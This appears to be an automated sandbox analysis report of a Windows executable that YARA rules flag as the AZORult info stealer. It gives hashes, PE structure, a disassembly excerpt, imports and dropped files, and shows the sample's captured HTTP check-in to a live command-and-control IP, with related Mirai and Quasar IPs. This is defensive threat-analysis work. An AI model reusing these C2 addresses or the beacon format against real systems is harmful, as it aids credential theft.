                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  TimeTypeDescription
                  04:22:23API Interceptor1x Sleep call for process: WerFault.exe modified
                  No context
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  OnlineSASFRloligang.x86.elfGet hashmaliciousMiraiBrowse
                  • 212.129.47.239
                  arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 62.210.51.189
                  nsharm5.elfGet hashmaliciousMiraiBrowse
                  • 51.159.173.14
                  nsharm.elfGet hashmaliciousMiraiBrowse
                  • 163.172.143.216
                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 51.158.216.108
                  StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                  • 51.15.17.193
                  1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                  • 51.15.17.193
                  BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                  • 51.15.17.193
                  HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                  • 51.15.17.193
                  hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                  • 51.15.17.193
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.929253751081848
                  Encrypted:false
                  SSDEEP:96:5bYK3knbKyZrmsi0hhi+7MnEQXIDcQVc6ccE1cw3D3YC+HbHg/8BRTf3o8Fa9KOW:eKUWmmN0rY/ijqMZL2EzuiFcZ24IO8X
                  MD5:63A9F3E64A415C7223D5D42CFDD56C84
                  SHA1:8D13F6BE17A191168864B29288B4BB018D24321F
                  SHA-256:46C4097E8D0B2A37D591E0734C92DD160F34B3222DC5F4A793FF6A804CE26FCA
                  SHA-512:25ADAEBCAED98AC0C83F2CDCE702F847BE1BCF93B9F4EA289FA60C5A8770AF030822893D7181A9ECF92F82954D1A5FAFE4B73B0C691839D6EFAB6DB5DA9F4A21
                  Malicious:true
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.9.6.9.2.6.7.1.1.1.0.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.9.6.9.2.7.6.7.9.8.5.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.5.6.9.7.2.4.-.3.5.b.d.-.4.1.4.7.-.9.0.7.0.-.c.f.3.d.3.9.9.e.1.f.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.1.5.9.1.6.3.-.8.7.3.0.-.4.2.7.9.-.b.7.9.7.-.9.7.9.a.f.2.6.2.6.7.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.p.5.i.D.5.2.k.n.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.4.-.5.2.e.f.-.3.1.9.a.2.e.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.e.4.0.8.8.7.d.d.2.3.e.1.b.c.8.4.5.1.3.b.1.3.4.3.e.0.3.d.a.b.a.0.0.0.0.f.f.f.f.!.0.0.0.0.9.a.e.0.5.4.9.7.5.2.7.3.3.b.7.9.f.2.4.4.f.c.c.b.6.5.7.2.7.9.2.d.a.c.d.6.8.b.5.0.!.8.p.5.i.D.5.2.k.n.N...e.x.e.....T.a.r.g.e.t.A.p.p.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jan 1 09:22:07 2025, 0x1205a4 type
                  Category:dropped
                  Size (bytes):43354
                  Entropy (8bit):2.795357252227803
                  Encrypted:false
                  SSDEEP:192:KfpoWBZKXzOUYspLTuhT1vp8cYqBLT8U48fbid/YoUlDj04GXKkm7bX9cd6Pj1d:IiWBJTcT4pBYq9T8G1lDSalDRPBd
                  MD5:977B4C3CD1950CA3F5BA174AA10F68BB
                  SHA1:67CCEFA2AC1E052608DBC9D353BF68879FBD847D
                  SHA-256:E45A26E7181B1FDA82B3B6F106FEE695F4F9CCF0C414FFD33713E99B05906A9B
                  SHA-512:A072AB1C214EBED1B2DB10C8D6A72F82583037EDDAAD0387A74F608F01A055E4165F270E67A8658DC1A42F1F8F446477D8824BA1B0F284E577DB066672746917
                  Malicious:false
                  Reputation:low
                  Preview:MDMP..a..... .......?.ug............4...........l...<.......d....(..........T.......8...........T............1...w......................................................................................................eJ......,.......GenuineIntel............T...........4.ug.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8314
                  Entropy (8bit):3.6947866948395105
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJ4V6Cp16Y9lSUyXgmff2pDG89bFbosfg/jm:R6lXJC6C76Y/SUyXgmffEFbbfw6
                  MD5:846547F8075DC5F519D6BF38B1E1100F
                  SHA1:01B055F819546759CD060E61CEA500C312FB9502
                  SHA-256:06BD58F5CFE4F1EE9F08202BC2A2D55246A7F4720E78307C3EDF9DE9A9CEC597
                  SHA-512:2324713FF6421DAFE5701E3726962EEBE62CB87D4CD8F1318D546114B583B1860953E9A090E189894B0AF74C38C82F6BF314C4E0B4612543AD7EAE34C39F8FF2
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4579
                  Entropy (8bit):4.460279840692546
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zslJg77aI94CCWpW8VY00Ym8M4Ji0ZFi0+q86vMitUknudfd:uIjf/I7DD7VjJrBnDtUyudfd
                  MD5:8ECA31C211253D6586FC928192C11748
                  SHA1:C1EB6394D3D08A4980CBA2849B782843A0872B08
                  SHA-256:49EBD9E3207D8FB63469BDDDD6BB7961B695D2A4B9D90F8FBA52267AEFD60BD6
                  SHA-512:889B37695561E1FA630C2E3DB336DB9282B2C2DCBB86D331AEB2E26EC01DD658B2C6871C82F68CE28D62D1433F8C228EA3DFDC1218BE7C2C725C045D4CB6B294
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="656664" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.46540816049214
                  Encrypted:false
                  SSDEEP:6144:cIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNvdwBCswSbW:hXD94+WlLZMM6YFHd+W
                  MD5:3020B81274ED43129CB0862112862575
                  SHA1:8F09595AB3A6B437F8C621A6BAA738327478F403
                  SHA-256:1B5AE17E058F9A9B0783536C2C19600EF63B2B9B5406FA92B6F859F5C3B5AD4A
                  SHA-512:F268D407B27DE79ACFABEFB0F3E6C2EF1423653110DD3B7C636BDBD045036CFAB64C60A358F90C7F1561C66AC145ADD5B22EC77E5B0CDD2D1822250BB2CD4C2B
                  Malicious:false
                  Reputation:low
                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..]..\..............................................................................................................................................................................................................................................................................................................................................* J.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.945829270167779
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:8p5iD52knN.exe
                  File size:313'344 bytes
                  MD5:c30e2baf61f34324ccbd0b0168def45e
                  SHA1:9ae0549752733b79f244fccb6572792dacd68b50
                  SHA256:0ac763391fc56711f3df8e6d6c047bd299c2b7052a69fb66a43fcab1c1b74826
                  SHA512:c97c413b36e96f394d4a4a7a965881910dceb22b59ebdb273f306e4db06d322318d6ace1ea06b660c077e516641ff21216a769b921364a24fe7d00eb98614721
                  SSDEEP:6144:7wQIfxC1Hqu69oRYT5hpjhFRIb9gyUiwd:hIfxCFqboRo5jhFCgy9Y
                  TLSH:AE64AD127B92C0B6C44324758E14CBB59FBEB57528656F4FABC84EBD0F34AC1CA2174A
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I`..I`..I`......I`......I`.....OI`......I`..Ia.NI`......I`......I`......I`.Rich.I`.........PE..L......Y.........."........
                  Icon Hash:1222480848224800
                  Entrypoint:0x406213
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x59A0E48A [Sat Aug 26 03:01:30 2017 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:8938b6606fdcc703cae7999268748e55
                  Instruction
                  call 00007FED388DF39Eh
                  jmp 00007FED388D6A9Dh
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov eax, dword ptr [ebp+08h]
                  xor ecx, ecx
                  cmp eax, dword ptr [00445150h+ecx*8]
                  je 00007FED388D6C35h
                  inc ecx
                  cmp ecx, 2Dh
                  jc 00007FED388D6C13h
                  lea ecx, dword ptr [eax-13h]
                  cmp ecx, 11h
                  jnbe 00007FED388D6C30h
                  push 0000000Dh
                  pop eax
                  pop ebp
                  ret
                  mov eax, dword ptr [00445154h+ecx*8]
                  pop ebp
                  ret
                  add eax, FFFFFF44h
                  push 0000000Eh
                  pop ecx
                  cmp ecx, eax
                  sbb eax, eax
                  and eax, ecx
                  add eax, 08h
                  pop ebp
                  ret
                  call 00007FED388DDB80h
                  test eax, eax
                  jne 00007FED388D6C28h
                  mov eax, 004452B8h
                  ret
                  add eax, 08h
                  ret
                  call 00007FED388DDB6Dh
                  test eax, eax
                  jne 00007FED388D6C28h
                  mov eax, 004452BCh
                  ret
                  add eax, 0Ch
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  push esi
                  call 00007FED388D6C07h
                  mov ecx, dword ptr [ebp+08h]
                  push ecx
                  mov dword ptr [eax], ecx
                  call 00007FED388D6BA7h
                  pop ecx
                  mov esi, eax
                  call 00007FED388D6BE1h
                  mov dword ptr [eax], esi
                  pop esi
                  pop ebp
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  call 00007FED388DDB32h
                  test eax, eax
                  jne 00007FED388D6C27h
                  push 0000000Ch
                  pop eax
                  pop ebp
                  ret
                  call 00007FED388D6BC4h
                  mov ecx, dword ptr [ebp+08h]
                  mov dword ptr [eax], ecx
                  xor eax, eax
                  pop ebp
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  push esi
                  mov esi, dword ptr [ebp+08h]
                  xor eax, eax
                  cmp esi, eax
                  jne 00007FED388D6C34h
                  push eax
                  push eax
                  Programming Language:
                  • [ASM] VS2008 build 21022
                  • [C++] VS2008 build 21022
                  • [ C ] VS2008 build 21022
                  • [IMP] VS2005 build 50727
                  • [RES] VS2008 build 21022
                  • [LNK] VS2008 build 21022
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x43c9c0xf2.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x43c240x78.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x42c8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x530000x1e3c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x41fd80x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x3f0000x214.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x3dd290x3de0027e5d58daf96009cfb2d2419da943f34False0.628716856060606data6.975637092375793IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x3f0000x58840x5a006eb301060eb780bbbdd2559377cadfe5False0.37395833333333334data5.130199861641048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x450000x68300x2200970aabe4f6c07c31d5fce58e51e8416cFalse0.2565487132352941data3.0727696145488217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .mysec30x4c0000x10050x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x4e0000x42c80x440064788b0d166acb761a9ad48e1b403db1False0.23494944852941177data6.218523193543295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x530000x206a0x220073c8c35047b9e040a6f55d42378f9295False0.7254136029411765data6.335499609177209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  ZADAPUPAJOWIHIVENONIRALINU0x521c80x100ASCII text, with no line terminatorsCroatianCroatia0.734375
                  ZAWAHEVECUZAWITAPUWOKIJOLAMICILE0x521580x70ASCII text, with no line terminatorsCroatianCroatia0.8928571428571429
                  RT_BITMAP0x4e2800x2db8Device independent bitmap graphic, 72 x 54 x 24, image size 11664CroatianCroatia0.12867395762132605
                  RT_ICON0x510480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0CroatianCroatia0.3850844277673546
                  RT_DIALOG0x521080x4cdataCroatianCroatia0.8289473684210527
                  RT_GROUP_ICON0x520f00x14dataCroatianCroatia1.1
                  None0x510380xadataCroatianCroatia1.8
                  DLLImport
                  KERNEL32.dllGetConsoleAliasesW, GetLastError, SetLastError, GetProcAddress, CreateNamedPipeA, CreateMemoryResourceNotification, LoadLibraryA, AddAtomW, FreeEnvironmentStringsW, VirtualProtect, GetCurrentDirectoryA, SetProcessShutdownParameters, LocalFree, GetStartupInfoW, CompareStringW, CompareStringA, CloseHandle, CreateFileA, GetTimeZoneInformation, GetLocaleInfoW, FreeLibrary, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, InitializeCriticalSectionAndSpinCount, SetFilePointer, IsValidLocale, ExitThread, FindResourceExA, GetSystemTimes, GetTickCount, FindFirstChangeNotificationW, GetCPInfo, GlobalMemoryStatus, SetEnvironmentVariableA, GetComputerNameA, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, IsValidCodePage, GetOEMCP, GetACP, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetStartupInfoA, RtlUnwind, RaiseException, LCMapStringW, LCMapStringA, GetStringTypeW, HeapAlloc, HeapCreate, HeapDestroy, VirtualFree, FatalAppExitA, VirtualAlloc, HeapReAlloc, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetCurrentThread, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, SetConsoleCtrlHandler, HeapSize, GetTimeFormatA, GetDateFormatA, GetModuleHandleA
                  USER32.dllUnloadKeyboardLayout, GetNextDlgGroupItem, LoadMenuIndirectA, BeginPaint, LoadIconW, GetRegisteredRawInputDevices, AppendMenuW, PeekMessageA, MapVirtualKeyExW, DlgDirSelectComboBoxExW, OpenClipboard, GetClipboardSequenceNumber, CallMsgFilterA, InsertMenuItemW
                  GDI32.dllSetPixel, SetRectRgn, CreateCompatibleDC, CreateDiscardableBitmap, StretchBlt
                  ADVAPI32.dllLookupPrivilegeNameA, OpenEventLogA
                  SHELL32.dllExtractAssociatedIconA, ShellAboutA, DragQueryFileW, ExtractIconExA, ShellExecuteA
                  Language of compilation systemCountry where language is spokenMap
                  CroatianCroatia
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2025-01-01T10:22:06.950300+01002029467ET MALWARE Win32/AZORult V3.3 Client Checkin M141192.168.2.44973051.15.241.16880TCP
                  2025-01-01T10:22:06.950300+01002810276ETPRO MALWARE AZORult CnC Beacon M11192.168.2.44973051.15.241.16880TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 1, 2025 10:22:06.018258095 CET4973080192.168.2.451.15.241.168
                  Jan 1, 2025 10:22:06.023894072 CET804973051.15.241.168192.168.2.4
                  Jan 1, 2025 10:22:06.023972034 CET4973080192.168.2.451.15.241.168
                  Jan 1, 2025 10:22:06.024120092 CET4973080192.168.2.451.15.241.168
                  Jan 1, 2025 10:22:06.029648066 CET804973051.15.241.168192.168.2.4
                  Jan 1, 2025 10:22:06.950241089 CET804973051.15.241.168192.168.2.4
                  Jan 1, 2025 10:22:06.950299978 CET4973080192.168.2.451.15.241.168
                  Jan 1, 2025 10:22:06.950392008 CET804973051.15.241.168192.168.2.4
                  Jan 1, 2025 10:22:06.950407982 CET4973080192.168.2.451.15.241.168
                  Jan 1, 2025 10:22:06.950443983 CET4973080192.168.2.451.15.241.168
                  Jan 1, 2025 10:22:06.955158949 CET804973051.15.241.168192.168.2.4
                  • 51.15.241.168
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.44973051.15.241.168807064C:\Users\user\Desktop\8p5iD52knN.exe
                  TimestampBytes transferredDirectionData
                  Jan 1, 2025 10:22:06.024120092 CET302OUTPOST /AED77D05-A028-477C-B013-04F33F1385C3/index.php HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                  Host: 51.15.241.168
                  Content-Length: 105
                  Cache-Control: no-cache
                  Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 9c 45 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 67 8b 31 11 8b 30 62 8b 30 65 ef 47 11 ed 26 66 9d 26 66 9d
                  Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;1&fEp10l0b0g10b0eG&f&f
                  Jan 1, 2025 10:22:06.950241089 CET735INHTTP/1.1 403 Forbidden
                  Server: nginx/1.4.5
                  Date: Wed, 01 Jan 2025 09:22:06 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 571
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 [TRUNCATED]
                  Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:04:21:56
                  Start date:01/01/2025
                  Path:C:\Users\user\Desktop\8p5iD52knN.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\8p5iD52knN.exe"
                  Imagebase:0x400000
                  File size:313'344 bytes
                  MD5 hash:C30E2BAF61F34324CCBD0B0168DEF45E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: kevoreilly
                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low
                  Has exited:true

                  Target ID:3
                  Start time:04:22:06
                  Start date:01/01/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016
                  Imagebase:0x980000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.6%
                    Dynamic/Decrypted Code Coverage:5.2%
                    Signature Coverage:6%
                    Total number of Nodes:597
                    Total number of Limit Nodes:13
